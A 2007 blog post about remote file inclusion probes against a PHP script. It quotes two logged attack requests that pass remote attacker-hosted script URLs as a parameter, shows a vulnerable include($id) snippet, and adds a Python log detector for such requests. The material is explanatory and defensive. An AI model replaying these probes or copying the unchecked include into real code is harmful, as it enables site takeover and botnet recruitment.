Sat, 06 Oct 2007

php include hack?

I happened to be watching a log file while testing something and noticed the following type of request go by:

217.11.225.208 - - [05/Oct/2007:12:46:32 -0400] "GET /pictures/index.php?id=830/index.php?id=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 200 1435 "-" "libwww-perl/5.805"

85.11.62.235 - - [06/Oct/2007:01:03:47 -0400] "GET /pictures/index.php?id=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 200 1455 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"


Which was interesting, as it's obviously some type of hack attempt. I decided to look into it and it seems to be a scripted attempt to pass the URL to any script that accepts a variable, in the hope that someone was silly enough to use that variable as an include and happened to have remote includes turned on in their PHP config, something like this:

<?php
// $id arrives straight from the request (register_globals) and is used
// unchecked as the include path; with remote includes enabled in php.ini
// a URL value makes PHP fetch and execute the attacker's file.
include($id);
// rest of script
?>


Then when the page is called, the URL is passed in as the include and the remote script gets executed. It seems to be some type of IRC bot, although the file is all encoded to help hide what exactly is going on; I'm sure you end up in some botnet ultimately. From what I read it's not uncommon for people to actually have a page set up like that for redirects or some such nonsense. Obviously not a good practice, as you'd likely end up a victim of this request.
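The log lines above are the whole signal: a query parameter whose value carries an absolute URL. The detector below is an added example, not part of the original post; it parses Apache combined-format lines and reports every URL-valued parameter, including the nested form in the first probe where the URL sits behind a second "?id=". The two probe lines are the ones from this post, the third line is a constructed benign request.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# An absolute URL anywhere inside a parameter value; searched rather than anchored,
# because scanners wrap the payload after a path fragment (".../index.php?id=http://...").
REMOTE_RE = re.compile(r'(?:https?|ftp)://', re.IGNORECASE)

# Sample input: two lines from the post plus one constructed benign request.
SAMPLE_LOG = [
    '217.11.225.208 - - [05/Oct/2007:12:46:32 -0400] "GET /pictures/index.php?id=830/index.php'
    '?id=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 200 1435 "-" "libwww-perl/5.805"',
    '85.11.62.235 - - [06/Oct/2007:01:03:47 -0400] "GET /pictures/index.php'
    '?id=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 200 1455 "-" '
    '"Wget/1.1 (compatible; i486; Linux; RedHat7.3)"',
    '192.0.2.10 - - [06/Oct/2007:01:10:00 -0400] "GET /pictures/index.php?id=830 HTTP/1.1" '
    '200 1435 "-" "Mozilla/5.0"',  # constructed: normal use of the same script
]


def find_rfi_probes(lines):
    """Return (client_ip, parameter, injected_url, status) for each request whose
    query string smuggles a URL. A 200 only says the script answered; compare the
    byte count with normal responses to judge whether the include actually ran."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m['target']).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            url = REMOTE_RE.search(value)
            if url:
                hits.append((m['ip'], name, value[url.start():], int(m['status'])))
                break  # one finding per request is enough
    return hits


if __name__ == '__main__':
    for ip, param, url, status in find_rfi_probes(SAMPLE_LOG):
        print(f'{ip} -> {param}={url} (HTTP {status})')
```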

Here is a copy of the scripts from the two examples above, hosted locally, as I doubt they'll be around on those hosts forever: cs.txt & cmd.txt

posted at: 02:45 | path: /security | permanent link to this entry
